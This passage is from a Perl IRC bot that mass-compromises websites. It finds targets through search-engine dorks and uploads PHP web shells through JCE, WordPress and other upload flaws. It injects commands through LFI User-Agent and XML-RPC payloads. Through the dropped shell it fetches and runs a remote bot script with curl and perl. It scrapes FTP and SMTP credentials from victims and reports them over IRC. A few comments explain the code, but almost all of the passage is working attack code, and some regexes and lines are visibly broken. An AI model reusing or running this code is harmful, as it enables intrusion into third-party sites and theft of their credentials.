# food.gif, and a JSON folderRename whose target ends in .php. The caller
# jce_exploit() afterwards requests images/stories/food.php on the same host.
# Blocking script execution in upload directories stops the renamed file from
# running even when the upload itself is accepted.

# ftp(host, user, pass, chan): tries one FTP login and reports the outcome
# over the bot's messaging channel. The callers visible in this file pass
# credentials scraped out of the response of the dropped shell, so a host that
# reaches this sub should be treated as having those credentials exposed and
# in need of rotation.
sub ftp() {
    my $host = $_[0];
    my $user = $_[1];
    my $pass = $_[2];
    my $chan = $_[3];
    # The parent waits for the first child; that child forks again and exits,
    # so the login attempt runs in the second-level child.
    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
        my $success = 1;
        use Net::FTP;
        my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5);
        # Inverted flag: $success becomes 0 when login() returns true, and the
        # report below fires on 0.
        $success = 0 if $ftp->login($user,$pass);
        $ftp->quit;
        # The message to $admin carries host and login; the string continues
        # on the following line.
        if ($success == 0) { &msg("$admin","4,1 [8FTP4] [ 8host : ".$host." 4] [ 8login : ".$user." 
4] [ 8pass : ".$pass." 4] 8Success "); &msg("$chan","4,1 [8FTP4] Found on 8http://$host "); } } exit; } } sub rci_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rcilogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; foreach my $jpath(@jpaths) { my $shell = "http://".$site.$jpath.$jshell; my $vuln = "http://".$site.$jpath.$jvuln."?name=lobex21.php"; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $status = &rci_upload($vuln); if ($status = 1) { my $check = &get_content($shell."?rf"); if ($check =~ /UnKnown - Simple Shell/) { &get_content($shell."?cmd=curl+-C+-+-O+".$botxx."perl alb.txt;rm -rf alb*"); my $safe = ""; my $os = ""; my $uid = ""; my $ftphost = ""; my $ftpuser = ""; my $ftppass = ""; my $ftpopen = ""; my $smtphost = ""; my $smtpuser = ""; my $smtppass = ""; my $smtpauth = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} if ($check =~ m/\$ftp_host = '(.+?)';/i){$ftphost=$1;} if ($check =~ m/\$ftp_user = '(.+?)';/i){$ftpuser=$1;} if ($check =~ m/\$ftp_pass = '(.+?)';/i){$ftppass=$1;} if ($check =~ m/\$ftp_enable = '(.+?)';/i){$ftpopen=$1;} if ($check =~ m/\$smtphost = '(.+?)';/i){$smtphost=$1;} if ($check =~ m/\$smtpuser = '(.+?)';/i){$smtpuser=$1;} if ($check =~ m/\$smtppass = '(.+?)';/i){$smtppass=$1;} if ($check =~ m/\$smtpauth = '(.+?)';/i){$smtpauth=$1;} &msg("$chan","$rcilogo4$engine 4<9=4>9 Target Sent To 4<9=4>9 $nick4 (SafeMode=$safe) (OS=$os) uid=$uid "); if ($nick eq $admin) { &msg("$admin","$rcilogo4$engine 4<9=4>9 sHeLL 4<9=4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); } else { &msg("$nick","$rcilogo4$engine 4<9=4>9 sHeLL 4<9=4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$rcilogo4$engine 4<9=4>9 sHeLL 4<9=4>9 $shell4 
(SafeMode=$safe) (OS=$os) uid=$uid "); } if ($smtpauth =~ /1/) { &msg("$chan","4,1 [8SMTP4] Found on 8http://$site "); &msg("$admin","4,1 [8SMTP4] [ 8host : ".$smtphost." 4] [ 8login : ".$smtpuser." 4] [ 8pass : ".$smtppass." 4]"); } if ($ftpopen =~ /1/){ my $hozt = $site; $hozt =~ s/\///; &ftp($hozt,$ftpuser,$ftppass,$chan); } } } } exit; } } if ($count == $num-1) { &msg("$chan","$rcilogo4$engine 9Finished 4for 9$dork "); if ($engine =~ /UoL/) { &sendraw("mode $chan -m"); } } } } } sub rci_upload() { my $success = 0; my $url = $_[0]; my $ua = LWP::UserAgent->new; my $data = " "; my $res = $ua->request(POST $url,Content_Type => 'text/plain', Content => $data); if ($res->is_success){ $success = 1; } return $success; } sub cgm_exploit() { my $chan = $_[0]; my $bugz = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$cgmlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$cgmlogo4$engine 9Finished 4for 9$dork "); } my $aplod = LWP::UserAgent->new; my $res = $aplod->post("http://".$site.$bugz,['qqfile' => ['./xxx.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); my $hasil = $res->content; my $path = "wp-content/2013/10/xxx.php"; if ($hasil=~ /xxx.php/){ &msg("$chan","$cgmlogo4$engine 9e3x9p3l9o3i9t3i9n3g 4http://$site "); my $test = "http://".$site.$path; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cekap = &get_content($test); if ($cekap =~ /UnKnown - Simple Shell/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$nick","$cgmlogo4$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test4 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$cgmlogo4$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test4 (SafeMode=$safe) (OS=$os) uid=$uid 
"); } } exit; } } } } } ################################################################################## sub search_engine() { my (@total,@clean); my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $logo = $_[4]; if ($engine eq "JacKAE") { my @jackae = &jack($dork."+Kontakt",$jackae); push(@total,@jackae); } if ($engine eq "JacKAR") { my @jackar = &jack($dork."+Produkt",$jackar); push(@total,@jackar); } if ($engine eq "JacKAT") { my @jackat = &jack($dork."+Domain",$jackat); push(@total,@jackat); } if ($engine eq "JacKAU") { my @jackau = &jack($dork."+Joomla",$jackau); push(@total,@jackau); } if ($engine eq "JacKBR") { my @jackbr = &jack($dork."+CMS",$jackbr); push(@total,@jackbr); } if ($engine eq "JacKCA") { my @jackca = &jack($dork."+Contact",$jackca); push(@total,@jackca); } if ($engine eq "JacKCL") { my @jackcl = &jack($dork."+Content",$jackcl); push(@total,@jackcl); } if ($engine eq "JacKCN") { my @jackcn = &jack($dork."+Preise",$jackcn); push(@total,@jackcn); } if ($engine eq "JacKCoM") { my @jackcom = &jack($dork."+Galerie",$jackcom); push(@total,@jackcom); } if ($engine eq "JacKCZ") { my @jackcz = &jack($dork."+Fotos",$jackcz); push(@total,@jackcz); } if ($engine eq "JacKDE") { my @jackde = &jack($dork."+Impressum",$jackde); push(@total,@jackde); } if ($engine eq "JacKDK") { my @jackdk = &jack($dork."+lang=de",$jackdk); push(@total,@jackdk); } if ($engine eq "JacKES") { my @jackes = &jack($dork."+Itemid",$jackes); push(@total,@jackes); } if ($engine eq "JacKEU") { my @jackeu = &jack($dork."+lang=en",$jackeu); push(@total,@jackeu); } if ($engine eq "JacKFR") { my @jackfr = &jack($dork."+Catalog",$jackfr); push(@total,@jackfr); } if ($engine eq "JacKHU") { my @jackhu = &jack($dork."+Empresa",$jackhu); push(@total,@jackhu); } if ($engine eq "JacKID") { my @jackid = &jack($dork."+Noticias",$jackid); push(@total,@jackid); } if ($engine eq "JacKIL") { my @jackil = &jack($dork."+Shop",$jackil); push(@total,@jackil); } if ($engine eq 
"JacKIN") { my @jackin = &jack($dork."+Admin",$jackin); push(@total,@jackin); } if ($engine eq "JacKInfO") { my @jackinfo = &jack($dork."+Articles",$jackinfo); push(@total,@jackinfo); } if ($engine eq "JacKIR") { my @jackir = &jack($dork."+Producten",$jackir); push(@total,@jackir); } if ($engine eq "JacKIT") { my @jackit = &jack($dork."+AGB",$jackit); push(@total,@jackit); } if ($engine eq "JacKJP") { my @jackjp = &jack($dork."+Presse",$jackjp); push(@total,@jackjp); } if ($engine eq "JacKKR") { my @jackkr = &jack($dork."+Accueil",$jackkr); push(@total,@jackkr); } if ($engine eq "JacKMX") { my @jackmx = &jack($dork."+Gallery",$jackmx); push(@total,@jackmx); } if ($engine eq "JacKMY") { my @jackmy = &jack($dork."+Fotos",$jackmy); push(@total,@jackmy); } if ($engine eq "JacKNeT") { my @jacknet = &jack($dork."+Photos",$jacknet); push(@total,@jacknet); } if ($engine eq "JacKNL") { my @jacknl = &jack($dork."+Katalog",$jacknl); push(@total,@jacknl); } if ($engine eq "JacKOrG") { my @jackorg = &jack($dork."+Loja",$jackorg); push(@total,@jackorg); } if ($engine eq "JacKPH") { my @jackph = &jack($dork."+Contacto",$jackph); push(@total,@jackph); } if ($engine eq "JacKPL") { my @jackpl = &jack($dork."+Copyright ©",$jackpl); push(@total,@jackpl); } if ($engine eq "JacKRO") { my @jackro = &jack($dork."+site:by",$jackro); push(@total,@jackro); } if ($engine eq "JacKRU") { my @jackru = &jack($dork."+Images",$jackru); push(@total,@jackru); } if ($engine eq "JacKTH") { my @jackth = &jack($dork."+index",$jackth); push(@total,@jackth); } if ($engine eq "JacKUA") { my @jackua = &jack($dork."+Strona",$jackua); push(@total,@jackua); } if ($engine eq "JacKUK") { my @jackuk = &jack($dork."+Produkty",$jackuk); push(@total,@jackuk); } if ($engine eq "JacKUS") { my @jackus = &jack($dork."+About",$jackus); push(@total,@jackus); } if ($engine eq "JacKSI") { my @jacksi = &jack($dork."+Contenido",$jacksi); push(@total,@jacksi); } if ($engine eq "JacKBE") { my @jackbe = 
&jack($dork."+StartSeite",$jackbe); push(@total,@jackbe); } if ($engine eq "JacKBIZ") { my @jackbiz = &jack($dork."+Frontpage",$jackbiz); push(@total,@jackbiz); } if ($engine eq "jackBY") { my @jackby = &jack($dork."+site:com",$jackby); push(@total,@jackby); } if ($engine eq "jackMA") { my @jackma = &jack($dork."+site:net",$jackma); push(@total,@jackma); } if ($engine eq "JacKBA") { my @jackba = &jack($dork."+site:org",$jackba); push(@total,@jackba); } if ($engine eq "JacKAL") { my @jackal = &jack($dork."+site:de",$jackal); push(@total,@jackal); } if ($engine eq "JacKCH") { my @jackch = &jack($dork."+site:nl",$jackch); push(@total,@jackch); } if ($engine eq "JacKLu") { my @jacklu = &jack($dork."+site:ru",$jacklu); push(@total,@jacklu); } if ($engine eq "JacKWS") { my @jackws = &jack($dork."+site:au",$jackws); push(@total,@jackws); } if ($engine eq "JacKDO") { my @jackdo = &jack($dork."+site:uk",$jackdo); push(@total,@jackdo); } if ($engine eq "JacKR1") { my @jackr1 = &jack($dork."+page",$jackr1); push(@total,@jackr1); } if ($engine eq "JacKR2") { my @jackr2 = &jack($dork."+admin",$jackr2); push(@total,@jackr2); } if ($engine eq "jackR3") { my @jackr3 = &jack($dork."+www",$jackr3); push(@total,@jackr3); } if ($engine eq "jackR4") { my @jackr4 = &jack($dork."+users",$jackr4); push(@total,@jackr4); } if ($engine eq "JacKR5") { my @jackr5 = &jack($dork."+domain",$jackr5); push(@total,@jackr5); } if ($engine eq "JacKR6") { my @jackr6 = &jack($dork."+kunden",$jackr6); push(@total,@jackr6); } if ($engine eq "JacKR7") { my @jackr7 = &jack($dork."+welcome",$jackr7); push(@total,@jackr7); } if ($engine eq "JacKR8") { my @jackr8 = &jack($dork."+?id=",$jackr8); push(@total,@jackr8); } if ($engine eq "JacKR9") { my @jackr9 = &jack($dork."+FAQ",$jackr9); push(@total,@jackr9); } if ($engine eq "JacK10") { my @jackr10 = &jack($dork."+login",$jackr10); push(@total,@jackr10); } if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); } if ($engine eq "GooGLeCA") 
{ my @googleCA = googleCA($dork); push(@total,@googleCA); } if ($engine eq "GooGLeDE") { my @googleDE = googleDE($dork); push(@total,@googleDE); } if ($engine eq "GooGLeUK") { my @googleUK = googleUK($dork); push(@total,@googleUK); } if ($engine eq "GooGLeFR") { my @googleFR = googleFR($dork); push(@total,@googleFR); } if ($engine eq "GooGLeES") { my @googleES = googleES($dork); push(@total,@googleES); } if ($engine eq "GooGLeIT") { my @googleIT = googleIT($dork); push(@total,@googleIT); } if ($engine eq "GooGLeNL") { my @googleNL = googleNL($dork); push(@total,@googleNL); } if ($engine eq "GooGLeBE") { my @googleBE = googleBE($dork); push(@total,@googleBE); } if ($engine eq "GooGLeCH") { my @googleCH = googleCH($dork); push(@total,@googleCH); } if ($engine eq "GooGLeSE") { my @googleSE = googleSE($dork); push(@total,@googleSE); } if ($engine eq "GooGLeDK") { my @googleDK = googleDK($dork); push(@total,@googleDK); } if ($engine eq "GooGLeNO") { my @googleNO = googleNO($dork); push(@total,@googleNO); } if ($engine eq "GooGLeNZ") { my @googleNZ = googleNZ($dork); push(@total,@googleNZ); } if ($engine eq "GooGLeIE") { my @googleIE = googleIE($dork); push(@total,@googleIE); } if ($engine eq "GooGLeBR") { my @googleBR = googleBR($dork); push(@total,@googleBR); } if ($engine eq "GooGLeAR") { my @googleAR = googleAR($dork); push(@total,@googleAR); } if ($engine eq "GooGLeCO") { my @googleCO = googleCO($dork); push(@total,@googleCO); } if ($engine eq "GooGLeCU") { my @googleCU = googleCU($dork); push(@total,@googleCU); } if ($engine eq "GooGLeCL") { my @googleCL = googleCL($dork); push(@total,@googleCL); } if ($engine eq "GooGLeMX") { my @googleMX = googleMX($dork); push(@total,@googleMX); } if ($engine eq "GooGLeAU") { my @googleAU = googleAU($dork); push(@total,@googleAU); } if ($engine eq "GooGLeRU") { my @googleRU = googleRU($dork); push(@total,@googleRU); } if ($engine eq "GooGLeAT") { my @googleAT = googleAT($dork); push(@total,@googleAT); } if ($engine eq 
"GooGLePL") { my @googlePL = googlePL($dork); push(@total,@googlePL); } if ($engine eq "GooGLeIL") { my @googleIL = googleIL($dork); push(@total,@googleIL); } if ($engine eq "GooGLeTR") { my @googleTR = googleTR($dork); push(@total,@googleTR); } if ($engine eq "GooGLeUA") { my @googleUA = googleUA($dork); push(@total,@googleUA); } if ($engine eq "GooGLeGR") { my @googleGR = googleGR($dork); push(@total,@googleGR); } if ($engine eq "GooGLeJP") { my @googleJP = googleJP($dork); push(@total,@googleJP); } if ($engine eq "GooGLeCN") { my @googleCN = googleCN($dork); push(@total,@googleCN); } if ($engine eq "GooGLeMY") { my @googleMY = googleMY($dork); push(@total,@googleMY); } if ($engine eq "GooGLeTH") { my @googleTH = googleTH($dork); push(@total,@googleTH); } if ($engine eq "GooGLeIN") { my @googleIN = googleIN($dork); push(@total,@googleIN); } if ($engine eq "GooGLeKR") { my @googleKR = googleKR($dork); push(@total,@googleKR); } if ($engine eq "GooGLeRO") { my @googleRO = googleRO($dork); push(@total,@googleRO); } if ($engine eq "GooGLeTW") { my @googleTW = googleTW($dork); push(@total,@googleTW); } if ($engine eq "GooGLeZA") { my @googleZA = googleZA($dork); push(@total,@googleZA); } if ($engine eq "GooGLePT") { my @googlePT = googlePT($dork); push(@total,@googlePT); } if ($engine eq "GooGLeBY") { my @googleBY = googleBY($dork); push(@total,@googleBY); } if ($engine eq "GooGLeSE") { my @googleSE = googleSE($dork); push(@total,@googleSE); } if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); } if ($engine eq "YaHoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); } if ($engine eq "YahOoCA") { my @yahooCA = yahooCA($dork); push(@total,@yahooCA); } if ($engine eq "YahOoUK") { my @yahooUK = yahooUK($dork); push(@total,@yahooUK); } if ($engine eq "YahOoDE") { my @yahooDE = yahooDE($dork); push(@total,@yahooDE); } if ($engine eq "YahOoFR") { my @yahooFR = yahooFR($dork); push(@total,@yahooFR); } if ($engine eq "YahOoES") { my @yahooES = 
yahooES($dork); push(@total,@yahooES); } if ($engine eq "YahOoIT") { my @yahooIT = yahooIT($dork); push(@total,@yahooIT); } if ($engine eq "YahOoHK") { my @yahooHK = yahooHK($dork); push(@total,@yahooHK); } if ($engine eq "YahOoID") { my @yahooID = yahooID($dork); push(@total,@yahooID); } if ($engine eq "YahOoIN") { my @yahooIN = yahooIN($dork); push(@total,@yahooIN); } if ($engine eq "YahOoAU") { my @yahooAU = yahooAU($dork); push(@total,@yahooAU); } if ($engine eq "YahOoMX") { my @yahooMX = yahooMX($dork); push(@total,@yahooMX); } if ($engine eq "YahOoTW") { my @yahooTW = yahooTW($dork); push(@total,@yahooTW); } if ($engine eq "YahOoBR") { my @yahooBR = yahooBR($dork); push(@total,@yahooBR); } if ($engine eq "YahOoAR") { my @yahooAR = yahooAR($dork); push(@total,@yahooAR); } if ($engine eq "YahOoNL") { my @yahooNL = yahooNL($dork); push(@total,@yahooNL); } if ($engine eq "YahOoDK") { my @yahooDK = yahooDK($dork); push(@total,@yahooDK); } if ($engine eq "YahOoPH") { my @yahooPH = yahooPH($dork); push(@total,@yahooPH); } if ($engine eq "YahOoCL") { my @yahooCL = yahooCL($dork); push(@total,@yahooCL); } if ($engine eq "YahOoRU") { my @yahooRU = yahooRU($dork); push(@total,@yahooRU); } if ($engine eq "YahOoCH") { my @yahooCH = yahooCH($dork); push(@total,@yahooCH); } if ($engine eq "YahOoCO") { my @yahooCO = yahooCO($dork); push(@total,@yahooCO); } if ($engine eq "YahOoFI") { my @yahooFI = yahooFI($dork); push(@total,@yahooFI); } if ($engine eq "YahOoRO") { my @yahooRO = yahooRO($dork); push(@total,@yahooRO); } if ($engine eq "YahOoVE") { my @yahooVE = yahooVE($dork); push(@total,@yahooVE); } if ($engine eq "YahOoAT") { my @yahooAT = yahooAT($dork); push(@total,@yahooAT); } if ($engine eq "YahOoPL") { my @yahooPL = yahooPL($dork); push(@total,@yahooPL); } if ($engine eq "YahOoKR") { my @yahooKR = yahooKR($dork); push(@total,@yahooKR); } if ($engine eq "YahOoNZ") { my @yahooNZ = yahooNZ($dork); push(@total,@yahooNZ); } if ($engine eq "YahOoGR") { my @yahooGR = 
yahooGR($dork); push(@total,@yahooGR); } if ($engine eq "YahOoPE") { my @yahooPE = yahooPE($dork); push(@total,@yahooPE); } if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); } if ($engine eq "AsKCA") { my @askCA = askCA($dork); push(@total,@askCA); } if ($engine eq "AsKDE") { my @askDE = askDE($dork); push(@total,@askDE); } if ($engine eq "AsKIT") { my @askIT = askIT($dork); push(@total,@askIT); } if ($engine eq "AsKUK") { my @askUK = askUK($dork); push(@total,@askUK); } if ($engine eq "AsKFR") { my @askFR = askFR($dork); push(@total,@askFR); } if ($engine eq "AsKES") { my @askES = askES($dork); push(@total,@askES); } if ($engine eq "AsKRU") { my @askRU = askRU($dork); push(@total,@askRU); } if ($engine eq "AsKNL") { my @askNL = askNL($dork); push(@total,@askNL); } if ($engine eq "AsKEU") { my @askEU = askEU($dork); push(@total,@askEU); } if ($engine eq "AsKPL") { my @askPL = askPL($dork); push(@total,@askPL); } if ($engine eq "AsKAT") { my @askAT = askAT($dork); push(@total,@askAT); } if ($engine eq "AsKSE") { my @askSE = askSE($dork); push(@total,@askSE); } if ($engine eq "AsKDK") { my @askDK = askDK($dork); push(@total,@askDK); } if ($engine eq "AsKNO") { my @askNO = askNO($dork); push(@total,@askNO); } if ($engine eq "AsKAU") { my @askAU = askAU($dork); push(@total,@askAU); } if ($engine eq "AsKBR") { my @askBR = askBR($dork); push(@total,@askBR); } if ($engine eq "AsKMX") { my @askMX = askMX($dork); push(@total,@askMX); } if ($engine eq "AsKJP") { my @askJP = askJP($dork); push(@total,@askJP); } if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); } if ($engine eq "BingDE") { my @bingDE = bingDE($dork); push(@total,@bingDE); } if ($engine eq "BingUK") { my @bingUK = bingUK($dork); push(@total,@bingUK); } if ($engine eq "BingCA") { my @bingCA = bingCA($dork); push(@total,@bingCA); } if ($engine eq "BingBR") { my @bingBR = bingBR($dork); push(@total,@bingBR); } if ($engine eq "BingFR") { my @bingFR = bingFR($dork); 
push(@total,@bingFR); } if ($engine eq "BingES") { my @bingES = bingES($dork); push(@total,@bingES); } if ($engine eq "BingIT") { my @bingIT = bingIT($dork); push(@total,@bingIT); } if ($engine eq "BingBE") { my @bingBE = bingBE($dork); push(@total,@bingBE); } if ($engine eq "BingNL") { my @bingNL = bingNL($dork); push(@total,@bingNL); } if ($engine eq "BingPT") { my @bingPT = bingPT($dork); push(@total,@bingPT); } if ($engine eq "BingNO") { my @bingNO = bingNO($dork); push(@total,@bingNO); } if ($engine eq "BingDK") { my @bingDK = bingDK($dork); push(@total,@bingDK); } if ($engine eq "BingSE") { my @bingSE = bingSE($dork); push(@total,@bingSE); } if ($engine eq "BingCH") { my @bingCH = bingCH($dork); push(@total,@bingCH); } if ($engine eq "BingNZ") { my @bingNZ = bingNZ($dork); push(@total,@bingNZ); } if ($engine eq "BingRU") { my @bingRU = bingRU($dork); push(@total,@bingRU); } if ($engine eq "BingJP") { my @bingJP = bingJP($dork); push(@total,@bingJP); } if ($engine eq "BingCN") { my @bingCN = bingCN($dork); push(@total,@bingCN); } if ($engine eq "BingKR") { my @bingKR = bingKR($dork); push(@total,@bingKR); } if ($engine eq "BingMX") { my @bingMX = bingMX($dork); push(@total,@bingMX); } if ($engine eq "BingAR") { my @bingAR = bingAR($dork); push(@total,@bingAR); } if ($engine eq "BingCL") { my @bingCL = bingCL($dork); push(@total,@bingCL); } if ($engine eq "BingAU") { my @bingAU = bingAU($dork); push(@total,@bingAU); } if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); } if ($engine eq "OnEt") { my @onet = &onet($dork); push(@total,@onet); } if ($engine eq "CLusTy") { my @clusty = &clusty($dork); push(@total,@clusty); } if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); } if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); } if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); } if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); } if ($engine eq "SeZNam") { my @seznam 
= &seznam($dork); push(@total,@seznam); } if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); } @clean = &clean(@total); if ($silentmode == 0) { &msg("$chan","$logo9$engine 4<9*0>9 Total:1 [0".scalar(@total)."0] 9 Clean:0 [0".scalar(@clean)."0] "); } return @clean; } ################################################################################## sub isFound() { my $status = 0; my $link = $_[0]; my $reqexp = $_[1]; my $res = &get_content($link); if ($res =~ /$reqexp/) { $status = 1 } return $status; } sub get_content() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout($timot); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content; } ######################################### SEARCH ENGINE sub jack() { my @list; my $key = $_[0]; my $jackx = $_[1]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($jackx.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/
/g) { my $link = $1; if ($link !~ /onet|webcache|query/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub clusty() { my @list; my $key = $_[0]; my $b = 0; for ($b=10; $b<=200; $b+=10) { my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&"); my $res = &search_engine_query($search); if ($res !~ /next/) {$b=100;} while ($res =~ m/]*)\"/g) { my $link = $1; if ($link !~ /uol\.com\.br|\/web/i){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub seznam() { my @list; my $key = $_[0]; for ($b=1; $b<=300; $b+=20) { my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=20&from=".$b); my $res = &search_engine_query($search); while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) { my $link = $1; if ($link !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub hotbot() { my @list; my $key = $_[0]; for ($b=0; $b<=50; $b+=1) { my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape($key)); my $res = &search_engine_query($search); if ($res =~ m/had no web result/i) {$b=50;} while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) { my $link = $1; if ($link !~ /hotbot\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub aol() { my @list; my $key = $_[0]; for ($b=0; $b<=300; $b+=10) { my $search = ("http://search.aol.com/aol/search?q=".uri_escape($key)."&page=".$b); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($link !~ /aol\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub biglobe { my $key = $_[0]; my @list; for ($b=1; $b<=500; $b+=10) { $num += $num; my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all"; my $res = 
&search_engine_query($search); while ( $res =~ m/new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return; my $sget = "GET $query HTTP/1.0\r\n"; $sget .= "Host: $host\r\n"; $sget .= "Accept: */*\r\n"; $sget .= "User-Agent: $uagent\r\n"; $sget .= "Connetion: Close\r\n\r\n"; print $sock $sget; my @pages = <$sock>; $page = "@pages"; close($sock); }; return $page; } ######################################### sub shell() { my $path = $_[0]; my $cmd = $_[1]; if ($cmd =~ /cd (.*)/) { chdir("$1") || &msg("$path","No such file or directory"); return; } elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my @output = `$cmd 2>&1 3>&1`; my $c = 0; foreach my $output (@output) { $c++; chop $output; &msg("$path","$output"); if ($c == 5) { $c = 0; sleep 3; } } exit; }} } sub isAdmin() { my $status = 0; my $nick = $_[0]; if ($nick eq $admin) { $status = 1; } return $status; } sub msg() { return unless $#_ == 1; sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]"); } sub nick() { return unless $#_ == 0; sendraw("NICK $_[0]"); } sub notice() { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); } sub cmdlfi() { my $browser = LWP::UserAgent->new; my $url = $_[0]; my $cmd = $_[1]; my $chan = $_[2]; my $hie = "lobex /dev/stdout\"); ?>byroe"; $browser->agent("$hie"); $browser->timeout(7); $response = $browser->get( $url ); if ($response->content =~ /lobex(.*)byroe/s) { &msg("$chan","$lfilogo9 ".$1." 
"); } else { &msg("$chan","$lfilogo4 No Output "); } } sub cmdxml() { my $jed = $_[0]; my $dwa = $_[1]; my $chan = $_[2]; my $userAgent = LWP::UserAgent->new(agent => 'perl post'); $exploit = ""; $exploit .= "test.method"; $exploit .= "',''));"; $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*"; my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit); if ($response->content =~ /bamby(.*)solo/s) { &msg("$chan","$xmllogo9 $1 "); } else { &msg("$chan","$xmllogo4 No Output "); } } sub read_dorks() { my $dork = uri_escape($_[0]); my $file = "dorks.txt"; my $success = 0; open (file,"<$file"); while (my $dorkx=) { chop($dorkx); if ($dorkx =~ /$dork/){ $success = 1; } } close file; return $success; } sub write_dorks() { my $dorks = uri_escape($_[0]); my $file = "dorks.txt"; open (filex,">>$file"); print filex $dorks."\n"; close filex; }